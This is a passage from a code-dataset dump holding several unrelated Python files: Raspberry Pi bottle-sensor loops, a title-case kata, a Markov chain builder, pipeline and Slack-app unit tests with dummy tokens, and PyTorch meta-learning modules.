bus.read_byte(address)):#当X和当时读进来的值不同就重新开始循环\n time1 = 0\n X = bus.read_byte(address)\n###########\n bus.write_byte(address,A2)\n if(Y == bus.read_byte(address)):\n time2 = time2 + 1\n elif(Y != bus.read_byte(address)):\n time2 = 0\n Y = bus.read_byte(address)\n############\n bus.write_byte(address,A3)\n if(Z == bus.read_byte(address)):\n time3 = time3 + 1\n elif(Z != bus.read_byte(address)):\n time3 = 0\n Z = bus.read_byte(address)\n############ \n if(time1 == Time|time2 == Time|time3 == Time):#同一个数值有十次就break\n time1 = 0\n time2 = 0\n time3 = 0\n check=3\n break\n print(\"red out\")\n \n#瓶子是否掉落,如果循环跳出,说明瓶子掉落\ndef loop3():\n Time = 0\n T = 5\n while True:\n time.sleep(1)\n bus.write_byte(address,A0)\n value = bus.read_byte(address)\n print(value)\n if(value <= 105):#没有瓶子\n Time= Time + 1\n else:\n Time = 0\n if(Time == 5):\n break\n\ndef loop():\n global check\n global sta\n global Num\n Num = 0\n ####\n uart2.write(\"#W1000\".encode(\"utf-8\"))#点击开始,发送信息\n readOnce()\n time.sleep(1.5)\n while True:\n uart2.write(\"#F1001\".encode(\"utf-8\"))#开始接收瓶子\n readOnce()\n #光敏电阻阶段\n loop1()\n #check=0一定时间无瓶子递入 check=1瓶子有标签 check=2瓶子无标签\n \n if(check == 0 & Num == 0):#回到UI开始界面,全部参数初始化,发送一个信息\n uart2.write(\"#F0000\".encode(\"utf-8\"))\n readOnce()\n destroy()\n GUI2.a = 0\n break\n ######!\n elif(check == 0 & Num != 0):#结束界面,重置所有参数,发送一个信息\n uart2.write(\"#F0000\".encode(\"utf-8\"))\n readOnce()\n destroy()\n GUI2.a = 0\n break\n #####!\n elif(check == 1):#有瓶子有标签, 切割步骤,发送信息\n uart2.write(\"#F1002\".encode(\"utf-8\"))\n readOnce()\n Num= Num + 1\n #########\n #红外线阶段\n time.sleep(4)\n while True:\n loop6()\n if(check == 3):#有东西经过,把瓶子送走\n uart2.write(\"#F1004\".encode(\"utf-8\"))\n readOnce()\n break\n elif(check == 4):\n break\n# elif(check == 4):#没东西经过\n# loop1()\n# if (check == 2):#标签已脱落,但没有掉落——发送消息,瓶子送走\n# uart2.write(\"#F1004\".encode(\"utf-8\"))\n# readOnce()\n# check = 0\n# break\n# elif(check == 1):#回到红外检测循环\n \n elif(check == 2):#有瓶子无标签, 瓶子送走\n uart2.write(\"#F1004\".encode(\"utf-8\"))\n readOnce()\n Num= Num+1\n print(check)\n if(check == 4):\n GUI2.a=0\n destroy()\n break\n #瓶子是否掉落,如果循环跳出,说明瓶子掉落\n loop3()\n print(Num)\n uart2.write(\"#F0000\".encode(\"utf-8\"))\n readOnce()\n if(sta == 0 ):\n uart2.write(\"#E9999\".encode(\"utf-8\"))\n readOnce()\n destroy()\n break\n\ndef loop4():\n while True:\n bus.write_byte(address,A3)\n Z =bus.read_byte(address)\n print(Z)\n\ndef loop5():\n global check\n Time = 0\n T = 5\n starttime = time.time()\n while True:\n if(time.time()-starttime >= 20):#一段时间检测不到东西\n check = 4\n #break\n bus.write_byte(address,A1)\n value = bus.read_byte(address)\n print(value)\n if(value>=70):\n Time = Time + 1\n if(Time >= T ):\n check = 3\n #break\n print(\"red out\")\n \ndef loop6():\n global check\n Time = 0\n T = 10\n bus.write_byte(address,A0)\n while True:\n time.sleep(0.5)\n value = bus.read_byte(address)\n print(value)\n if(value>100 and value <= 125):\n Time= Time+1\n if(Time>=T):\n check = 3\n break\n print(\"red out\")\n if(GUI2.a == 0):\n check = 4\n break\n \n \ndef destroy():\n global check\n global sta\n global Num\n \n check = 0\n Num = 0\n sta=0","repo_name":"2forFive/LabelOFF-Raspi","sub_path":"PhotoresistorAndInfrared.py","file_name":"PhotoresistorAndInfrared.py","file_ext":"py","file_size_in_byte":8200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73213682793","text":"def title_case(title, minor_words=''):\n if title == '':\n return title\n else:\n title = title.lower().split(' ')\n minor_words = minor_words.lower().split(' ')\n for word in range(len(title)):\n if title[word] not in minor_words or word == 0:\n title[word] = title[word][0].upper() + title[word][1:]\n\n return ' '.join(title)\n\n\nprint(title_case('', ''))\n","repo_name":"DaveAigbe/Challenges","sub_path":"CodeWars/CW- Title Case.py","file_name":"CW- Title Case.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8387725879","text":"#! Version 3\r\nimport os\r\nimport pickle\r\nfrom markov_chain import Markov_Chain\r\nfrom markov_tree import Markov_Tree\r\nimport time\r\n\r\n\r\nclass Markov_Builder:\r\n\r\n def __init__(self, interface, path, n, max_keys=100000):\r\n self.path = path\r\n self.n = n\r\n self.max_keys = max_keys\r\n self.tree = Markov_Tree(\r\n f'{path}-mc/{self}', n, max_keys)\r\n with open(f'{path}-mc/bck/latest.txt') as f:\r\n self.part_count = int(f.readline().strip('\\n'))\r\n\r\n def run(self):\r\n paths = self._get_bck_files()\r\n self.tree.reset_dir()\r\n print(f'[STA] Merging {len(paths)} parts')\r\n self.current_bck = 0\r\n self.total_bck = len(paths)\r\n start = time.time()\r\n for i in range(self.total_bck):\r\n self.current_bck = i\r\n with open(paths[i], 'rb') as f:\r\n status = self.tree.insert(pickle.load(f))\r\n if i > 0:\r\n left = (time.time() - start) / i\r\n else:\r\n left = -1\r\n print(\r\n f'[STA] Files: {status[0]} / Total Keys: {status[1]} / Last File: {status[2]} / Secs Left: {left} ', end='\\r')\r\n\r\n print(\r\n f'[STA] Merge completed after {time.time() - start} seconds. Files can be found at {self.tree.path}.')\r\n return Markov_Chain(self.tree.path, self.n)\r\n\r\n def __str__(self):\r\n return f'mc3-n{self.n}-K{self.max_keys}'\r\n\r\n def _get_bck_files(self):\r\n files = []\r\n for i in range(1, self.part_count+1):\r\n files.append(self._bck_file(i))\r\n return files\r\n\r\n def _bck_file(self, x):\r\n return f'{self.path}-mc/bck/{x}.{self.n}.pkl'\r\n","repo_name":"mifrandir/seminararbeit-demo","sub_path":"program/mc3/markov_builder.py","file_name":"markov_builder.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"444169239","text":"# coding: utf-8\n\nimport pytest\nfrom hamcrest import assert_that\n\nfrom market.idx.datacamp.controllers.piper.yatf.resources.config_mock import PiperConfigMock\nfrom market.idx.datacamp.controllers.piper.yatf.test_env_old import PiperTestEnv\nfrom market.idx.datacamp.proto.api.DatacampMessage_pb2 import DatacampMessage\nfrom market.idx.datacamp.proto.promo.Promo_pb2 import PromoDescription, PromoType, PromoPromotion\nfrom market.idx.pylibrary.datacamp.utils import wait_until\nfrom market.idx.yatf.matchers.protobuf_matchers import IsSerializedProtobuf\nfrom market.idx.yatf.matchers.yt_rows_matchers import HasDatacampPromoRows\nfrom market.idx.yatf.resources.datacamp.datacamp_tables import (\n DataCampPromoTable,\n)\nfrom market.idx.yatf.resources.lbk_topic import LbkTopic\nfrom market.idx.yatf.utils.utils import create_timestamp_from_json\nfrom market.proto.common.promo_pb2 import ESourceType\nfrom market.pylibrary.proto_utils import message_from_data\n\n\nMETA_0 = {'timestamp': '2020-12-01T19:27:36Z'}\nMETA_1 = {'timestamp': '2020-12-02T19:27:36Z'}\n\nPROMOS = [\n {\n 'primary_key': {\n 'promo_id': '0'\n }\n },\n {\n 'primary_key': {\n 'promo_id': '0',\n 'business_id': 1\n }\n },\n {\n 'primary_key': {\n 'promo_id': '0',\n 'business_id': 2,\n 'source': ESourceType.PARTNER_SOURCE\n }\n },\n {\n 'primary_key': {\n 'promo_id': '1',\n 'business_id': 2,\n 'source': ESourceType.PARTNER_SOURCE\n },\n 'promo_general_info': {\n 'meta': META_0,\n 'promo_type': PromoType.PRICE_DROP,\n },\n 'constraints': {\n 'meta': META_0,\n 'enabled': True,\n 'start_date': 1606775557\n },\n 'responsible': {\n 'meta': META_0,\n 'author': 'Medved'\n },\n 'promotion': {\n 'meta': META_0,\n 'channel': [\n PromoPromotion.Channel.CATEGORY_ORDINARY_BANNER,\n PromoPromotion.Channel.PRODUCT_OF_DAY\n ]\n },\n 'mechanics_data': {\n 'meta': META_0,\n 'market_bonus': {\n 'description': 'Some description'\n }\n },\n 'additional_info': {\n 'meta': META_0,\n 'name': 'Super discount',\n }\n },\n]\n\n\ndef patch_metas(promos):\n fields_with_meta = ('promo_general_info', 'constraints', 'responsible', 'promotion', 'mechanics_data', 'additional_info')\n\n # Хакерство их-за timestamp-ов\n o = list(promos)\n for promo in o:\n for f in fields_with_meta:\n if f in promo and 'meta' in promo[f]:\n ts = create_timestamp_from_json(promo[f]['meta']['timestamp'])\n promo[f]['meta'] = {'timestamp': {'seconds': ts.seconds}}\n return o\n\n\n@pytest.fixture(scope='module')\ndef output_promos():\n return patch_metas(PROMOS)\n\n\n@pytest.fixture(scope='module')\ndef promos_table(yt_server, config):\n return DataCampPromoTable(\n yt_server,\n config.yt_promo_tablepath,\n )\n\n\n@pytest.fixture(scope='module')\ndef promos_datacamp_messages():\n return [message_from_data({'promos': {'promo': PROMOS}}, DatacampMessage())]\n\n\n@pytest.fixture(scope='module')\ndef promos_topic(log_broker_stuff):\n topic = LbkTopic(log_broker_stuff)\n return topic\n\n\n@pytest.fixture(scope='module')\ndef config(yt_server, log_broker_stuff, promos_topic):\n cfg = {\n 'logbroker': {\n 'promos_topic': promos_topic.topic\n },\n 'general': {\n 'color': 'white',\n }\n }\n\n return PiperConfigMock(yt_server=yt_server,\n log_broker_stuff=log_broker_stuff,\n config=cfg)\n\n\n@pytest.yield_fixture(scope='module')\ndef piper(yt_server, log_broker_stuff, config, promos_topic):\n resources = {\n 'config': config,\n 'promos_topic': promos_topic,\n }\n with PiperTestEnv(yt_server, log_broker_stuff, **resources) as piper_env:\n piper_env.verify()\n yield piper_env\n\n\n@pytest.fixture(scope='module')\ndef main_promos_inserter(promos_datacamp_messages, piper, promos_topic):\n for message in promos_datacamp_messages:\n promos_topic.write(message.SerializeToString())\n\n wait_until(lambda: piper.promo_processed >= len(PROMOS), timeout=60)\n\n\n# Проверка того, что акции корректно записываются из топика в таблицу\ndef test_write_new_promos(main_promos_inserter, piper, output_promos):\n assert_that(\n piper.promos_table.data,\n HasDatacampPromoRows(\n [\n {\n 'business_id': promo['primary_key']['business_id'] if 'business_id' in promo['primary_key'] else 0,\n 'source': promo['primary_key']['source'] if 'source' in promo['primary_key'] else 0,\n 'promo_id': promo['primary_key']['promo_id'],\n 'promo': IsSerializedProtobuf(PromoDescription, promo),\n }\n for promo in output_promos\n ]\n ),\n 'Missing promos'\n )\n\n\n# Проверка того, что акции корректно обновляются из топика\ndef test_update_promos(main_promos_inserter, piper, promos_topic, promos_datacamp_messages, output_promos, promos_table):\n # Проводим тест после того как обработаны сообщения из main_promos_inserter\n promo = {\n 'primary_key': {\n 'promo_id': 'SomePromo',\n 'business_id': 3,\n 'source': ESourceType.PARTNER_SOURCE\n },\n 'promo_general_info': {\n 'meta': META_0,\n 'promo_type': PromoType.PRICE_DROP,\n },\n 'constraints': {\n 'meta': META_0,\n 'enabled': True,\n 'start_date': 1606775557\n },\n 'responsible': {\n 'meta': META_0,\n 'author': 'Cat'\n },\n 'promotion': {\n 'meta': META_0,\n 'channel': [PromoPromotion.Channel.CATEGORY_ORDINARY_BANNER, PromoPromotion.Channel.PRODUCT_OF_DAY]\n },\n 'mechanics_data': {\n 'meta': META_0,\n 'market_bonus': {\n 'description': 'Some description'\n }\n },\n 'additional_info': {\n 'meta': META_0,\n 'name': 'Super discount',\n }\n }\n # Записали в топик оригинальные данные\n message = message_from_data({'promos': {'promo': [promo]}}, DatacampMessage())\n promos_topic.write(message.SerializeToString())\n wait_until(lambda: piper.promo_processed >= len(PROMOS) + 1, timeout=60)\n\n # Обновляем все поля + добавляем что-то ещё\n promo_update = {\n 'primary_key': {\n 'promo_id': 'SomePromo',\n 'business_id': 3,\n 'source': ESourceType.PARTNER_SOURCE\n },\n 'promo_general_info': {\n 'meta': META_1,\n 'promo_type': PromoType.BLUE_CASHBACK,\n },\n 'constraints': {\n 'meta': META_1,\n 'enabled': False,\n 'start_date': 1606775559,\n 'offers_matching_rules': [\n {\n 'category_restriction': {\n 'promo_category': [{\n 'id': 10\n }]\n }\n }\n ]\n },\n 'responsible': {\n 'meta': META_1,\n 'author': 'Dog'\n },\n 'promotion': {\n 'meta': META_1,\n 'channel': [PromoPromotion.Channel.PRODUCT_OF_DAY]\n },\n 'mechanics_data': {\n 'meta': META_1,\n 'market_bonus': {\n 'description': 'Some description222'\n }\n },\n 'additional_info': {\n 'meta': META_1,\n 'name': 'Super discount333',\n }\n }\n\n # Записываем обновление\n message = message_from_data({'promos': {'promo': [promo_update]}}, DatacampMessage())\n promos_topic.write(message.SerializeToString())\n # Ждём когда будут обработаны ещё 2 наших сообщения (акция + обновление)\n wait_until(lambda: piper.promo_processed >= len(PROMOS) + 2, timeout=60)\n\n updated_promo = dict(promo)\n updated_promo.update(promo_update)\n\n expected_promos = list(output_promos)\n # В этом тесте мы закинули одну акцию и обновление к ней.\n expected_promos.extend(patch_metas([updated_promo]))\n\n for p in expected_promos:\n assert_that(\n piper.promos_table.data,\n HasDatacampPromoRows(\n [\n {\n 'business_id': p['primary_key']['business_id'] if 'business_id' in p['primary_key'] else 0,\n 'source': p['primary_key']['source'] if 'source' in p['primary_key'] else 0,\n 'promo_id': p['primary_key']['promo_id'],\n 'promo': IsSerializedProtobuf(PromoDescription, p),\n }\n ]\n ),\n 'Missing promos'\n )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/test_promos.py","file_name":"test_promos.py","file_ext":"py","file_size_in_byte":9362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26490984424","text":"\"\"\"\nUnit tests for handling Slack Chat in ImmediateResponse.py\n\"\"\"\nimport json\nimport os\nimport unittest\nfrom unittest.mock import patch\n\nos.environ[\"SlackAppId\"] = \"APIID123456\"\nos.environ[\"SlackChannelIds\"] = \"C1111111111,C2222222222\"\nos.environ[\"SlackTeamIds\"] = \"T1111111111,T2222222222\"\nos.environ[\"SlackVerificationTokenParameterKey\"] = \"/apps/slack_app/dummy/token\"\nos.environ[\"AsyncWorkerLambdaFunctionName\"] = \"Dummy-AsyncWorker\"\nos.environ[\"SyncWorkerLambdaFunctionName\"] = \"Dummy-SyncWorker\"\nos.environ[\"OAuthDynamoDBTable\"] = \"DummyDDB\"\n\nfunc = __import__(\"ImmediateResponse\")\n\n\ndef mock_event(custom_data={}, channel=\"C1111111111\"):\n data = {\n \"token\": \"dummy-token\",\n \"team_id\": \"T1111111111\",\n \"api_app_id\": \"APIID123456\",\n \"event\": {\n \"client_msg_id\": \"b03d5869-53c0-4287-a711-0e7d34a8c001\",\n \"type\": \"app_mention\",\n \"text\": \"<@UB111111111>\",\n \"user\": \"U2222222222\",\n \"ts\": \"1634873264.005100\",\n \"team\": \"T1111111111\",\n \"blocks\": [\n {\n \"type\": \"rich_text\",\n \"block_id\": \"Cj64\",\n \"elements\": [\n {\n \"type\": \"rich_text_section\",\n \"elements\": [\n {\"type\": \"user\", \"user_id\": \"UB111111111\"},\n {\"type\": \"text\", \"text\": \" what\\nline 2\\nline 3\"},\n ],\n }\n ],\n }\n ],\n \"channel\": channel,\n \"event_ts\": \"1634873264.005100\",\n },\n \"type\": \"event_callback\",\n \"event_id\": \"Ev02JGDEJTCN\",\n \"event_time\": 1634873264,\n \"authed_users\": [\"UB111111111\"],\n \"authorizations\": [\n {\n \"enterprise_id\": \"null\",\n \"team_id\": \"T1111111111\",\n \"user_id\": \"UB111111111\",\n \"is_bot\": \"true\",\n \"is_enterprise_install\": \"false\",\n }\n ],\n \"is_ext_shared_channel\": \"false\",\n \"event_context\": \"xxx\",\n }\n data.update(custom_data)\n\n return {\"body\": json.dumps(data)}\n\n\ndef payload_in_bytes():\n payload_json = {\n \"app_id\": \"APIID123456\",\n \"channel_id\": \"C1111111111\",\n \"team_id\": \"T1111111111\",\n \"text\": \" what\\nline 2\\nline 3\",\n \"ts\": \"1634873264.005100\",\n \"user_id\": \"U2222222222\",\n }\n payload_str = json.dumps(payload_json)\n return bytes(payload_str, encoding=\"utf8\")\n\n\nMOCK_LAMBDA_INVOKE_RESPONSE = {\n \"ResponseMetadata\": {\n \"HTTPStatusCode\": 200,\n }\n}\n\n\nclass TestFunction(unittest.TestCase):\n def test_lambda_handler_all_good(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.lambda_client.invoke\"\n ) as mock_lambda_invoke:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n mock_lambda_invoke.return_value = MOCK_LAMBDA_INVOKE_RESPONSE\n\n ret = func.lambda_handler(mock_event(), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"T1111111111\"}\n )\n\n mock_lambda_invoke.assert_called_once_with(\n FunctionName=\"Dummy-AsyncWorker\",\n InvocationType=\"Event\",\n Payload=payload_in_bytes(),\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_invalid_token(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n\n ret = func.lambda_handler(mock_event({\"token\": \"invalid-token\"}), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"T1111111111\"}\n )\n\n mock_chat_post.assert_called_once_with(\n \"C1111111111\",\n \"1634873264.005100\",\n \"dummy-bot-token\",\n \"Sorry <@U2222222222>, an authentication error occurred. Please contact your admin.\",\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_no_bot_token(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n # No item found for that team_id\n mock_ddb_get_item.return_value = {\"Item\": None}\n\n ret = func.lambda_handler(mock_event(), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"T1111111111\"}\n )\n\n mock_chat_post.assert_not_called()\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_invalid_app_id(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n\n ret = func.lambda_handler(mock_event({\"api_app_id\": \"invalid-app-id\"}), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"invalid-app-id\", \"team_id\": \"T1111111111\"}\n )\n\n mock_chat_post.assert_called_once_with(\n \"C1111111111\",\n \"1634873264.005100\",\n \"dummy-bot-token\",\n \"Sorry <@U2222222222>, this app does not support this app ID invalid-app-id.\",\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_invalid_team_id(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n\n ret = func.lambda_handler(mock_event({\"team_id\": \"invalid-team-id\"}), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"invalid-team-id\"}\n )\n\n mock_chat_post.assert_called_once_with(\n \"C1111111111\",\n \"1634873264.005100\",\n \"dummy-bot-token\",\n \"Sorry <@U2222222222>, this app does not support this team ID invalid-team-id.\",\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n def test_lambda_handler_failed_invalid_channel_id(self):\n with patch(\n \"ImmediateResponse.ssm_client.get_parameter\",\n return_value={\"Parameter\": {\"Value\": \"dummy-token\"}},\n ), patch(\"ImmediateResponse.oauth_table.get_item\") as mock_ddb_get_item, patch(\n \"ImmediateResponse.call_slack_chat_post\"\n ) as mock_chat_post:\n mock_ddb_get_item.return_value = {\"Item\": {\"access_token\": \"dummy-bot-token\"}}\n\n ret = func.lambda_handler(mock_event(channel=\"invalid-channel-id\"), None)\n\n mock_ddb_get_item.assert_called_once_with(\n Key={\"app_id\": \"APIID123456\", \"team_id\": \"T1111111111\"}\n )\n\n mock_chat_post.assert_called_once_with(\n \"invalid-channel-id\",\n \"1634873264.005100\",\n \"dummy-bot-token\",\n \"Sorry <@U2222222222>, this app does not support this channel ID invalid-channel-id.\",\n )\n\n self.assertDictEqual(ret, {\"statusCode\": 200})\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"kyhau/slack-chat-app-cdk","sub_path":"lambda/ImmediateResponse.test.py","file_name":"ImmediateResponse.test.py","file_ext":"py","file_size_in_byte":8673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"26742176624","text":"# -*- encoding: utf-8 -*-\r\n#Time :2021/03/15 16:53:33\r\n#Author :Chen\r\n#FileName :meta_base.py\r\n#Version :1.0\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\nimport torchvision\r\nfrom torch.autograd import Variable\r\nimport itertools\r\n\r\n\r\ndef to_var(x, requires_grad=True):\r\n if torch.cuda.is_available():\r\n x = x.cuda()\r\n return Variable(x, requires_grad=requires_grad)\r\n\r\n\r\nclass MetaModule(nn.Module):\r\n # adopted from: Adrien Ecoffet https://github.com/AdrienLE\r\n def params(self):\r\n for name, param in self.named_params(self):\r\n yield param\r\n\r\n def named_leaves(self):\r\n return []\r\n\r\n def named_submodules(self):\r\n return []\r\n\r\n def named_params(self, curr_module=None, memo=None, prefix=''):\r\n if memo is None:\r\n memo = set()\r\n\r\n if hasattr(curr_module, 'named_leaves'):\r\n for name, p in curr_module.named_leaves():\r\n if p is not None and p not in memo:\r\n memo.add(p)\r\n yield prefix + ('.' if prefix else '') + name, p\r\n else:\r\n for name, p in curr_module._parameters.items():\r\n if p is not None and p not in memo:\r\n memo.add(p)\r\n yield prefix + ('.' if prefix else '') + name, p\r\n\r\n for mname, module in curr_module.named_children():\r\n submodule_prefix = prefix + ('.' if prefix else '') + mname\r\n for name, p in self.named_params(module, memo, submodule_prefix):\r\n yield name, p\r\n\r\n def update_params(self, lr_inner, first_order=False, source_params=None, detach=False):\r\n if source_params is not None:\r\n for tgt, src in zip(self.named_params(self), source_params):\r\n name_t, param_t = tgt\r\n # name_s, param_s = src\r\n # grad = param_s.grad\r\n # name_s, param_s = src\r\n grad = src\r\n if first_order:\r\n grad = to_var(grad.detach().data)\r\n tmp = param_t - lr_inner * grad\r\n self.set_param(self, name_t, tmp)\r\n else:\r\n\r\n for name, param in self.named_params(self):\r\n if not detach:\r\n grad = param.grad\r\n if first_order:\r\n grad = to_var(grad.detach().data)\r\n tmp = param - lr_inner * grad\r\n self.set_param(self, name, tmp)\r\n else:\r\n param = param.detach_()\r\n self.set_param(self, name, param)\r\n\r\n def set_param(self, curr_mod, name, param):\r\n if '.' in name:\r\n n = name.split('.')\r\n module_name = n[0]\r\n rest = '.'.join(n[1:])\r\n for name, mod in curr_mod.named_children():\r\n if module_name == name:\r\n self.set_param(mod, rest, param)\r\n break\r\n else:\r\n setattr(curr_mod, name, param)\r\n\r\n def detach_params(self):\r\n for name, param in self.named_params(self):\r\n self.set_param(self, name, param.detach())\r\n\r\n def copy(self, other, same_var=False):\r\n for name, param in other.named_params():\r\n if not same_var:\r\n param = to_var(param.data.clone(), requires_grad=True)\r\n self.set_param(name, param)\r\n\r\n\r\nclass MetaLinear(MetaModule):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.Linear(*args, **kwargs)\r\n\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\r\n\r\n def forward(self, x):\r\n return F.linear(x, self.weight, self.bias)\r\n\r\n def named_leaves(self):\r\n return [('weight', self.weight), ('bias', self.bias)]\r\n\r\n\r\nclass MetaConv2d(MetaModule):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.Conv2d(*args, **kwargs)\r\n\r\n self.stride = ignore.stride\r\n self.padding = ignore.padding\r\n self.dilation = ignore.dilation\r\n self.groups = ignore.groups\r\n self.kernel_size = ignore.kernel_size\r\n self.out_channels = ignore.out_channels\r\n\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n\r\n if ignore.bias is not None:\r\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\r\n else:\r\n self.register_buffer('bias', None)\r\n\r\n def forward(self, x):\r\n return F.conv2d(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\r\n\r\n def named_leaves(self):\r\n return [('weight', self.weight), ('bias', self.bias)]\r\n\r\n\r\nclass MetaEmbedding(MetaModule):\r\n \"\"\"docstring for Meta_embedding\"\"\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.Embedding(*args, **kwargs)\r\n self.num_embeddings = ignore.num_embeddings\r\n self.embedding_dim = ignore.embedding_dim\r\n self.padding_idx = ignore.padding_idx\r\n self.max_norm = ignore.max_norm\r\n self.norm_type = ignore.norm_type\r\n self.scale_grad_by_freq = ignore.scale_grad_by_freq\r\n self.sparse = ignore.sparse\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n\r\n def forward(self, x):\r\n return F.embedding(x, self.weight, self.padding_idx, self.max_norm,\r\n self.norm_type, self.scale_grad_by_freq, self.sparse)\r\n\r\n def named_leaves(self):\r\n return [('weight', self.weight)]\r\n\r\n\r\nclass MetaConvTranspose2d(MetaModule):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.ConvTranspose2d(*args, **kwargs)\r\n\r\n self.stride = ignore.stride\r\n self.padding = ignore.padding\r\n self.dilation = ignore.dilation\r\n self.groups = ignore.groups\r\n\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n\r\n if ignore.bias is not None:\r\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\r\n else:\r\n self.register_buffer('bias', None)\r\n\r\n def forward(self, x, output_size=None):\r\n output_padding = self._output_padding(x, output_size)\r\n return F.conv_transpose2d(x, self.weight, self.bias, self.stride, self.padding,\r\n output_padding, self.groups, self.dilation)\r\n\r\n def named_leaves(self):\r\n return [('weight', self.weight), ('bias', self.bias)]\r\n\r\n\r\nclass MetaBatchNorm2d(MetaModule):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.BatchNorm2d(*args, **kwargs)\r\n\r\n self.num_features = ignore.num_features\r\n self.eps = ignore.eps\r\n self.momentum = ignore.momentum\r\n self.affine = ignore.affine\r\n self.track_running_stats = ignore.track_running_stats\r\n self.num_batches_tracked = ignore.num_batches_tracked\r\n\r\n if self.affine:\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\r\n\r\n if self.track_running_stats:\r\n self.register_buffer('running_mean', torch.zeros(ignore.num_features))\r\n self.register_buffer('running_var', torch.ones(ignore.num_features))\r\n else:\r\n self.register_parameter('running_mean', None)\r\n self.register_parameter('running_var', None)\r\n\r\n def forward(self, x):\r\n return F.batch_norm(x, self.running_mean, self.running_var, self.weight, self.bias,\r\n self.training or not self.track_running_stats, self.momentum, self.eps)\r\n\r\n def named_leaves(self):\r\n return [('weight', self.weight), ('bias', self.bias)]\r\n\r\n\r\nclass LeNet(MetaModule):\r\n def __init__(self, n_out):\r\n super(LeNet, self).__init__()\r\n\r\n layers = []\r\n layers.append(MetaConv2d(1, 6, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(MetaConv2d(6, 16, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(MetaConv2d(16, 120, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n\r\n self.main = nn.Sequential(*layers)\r\n\r\n layers = []\r\n layers.append(MetaLinear(120, 84))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(MetaLinear(84, n_out))\r\n\r\n self.fc_layers = nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.main(x)\r\n x = x.view(-1, 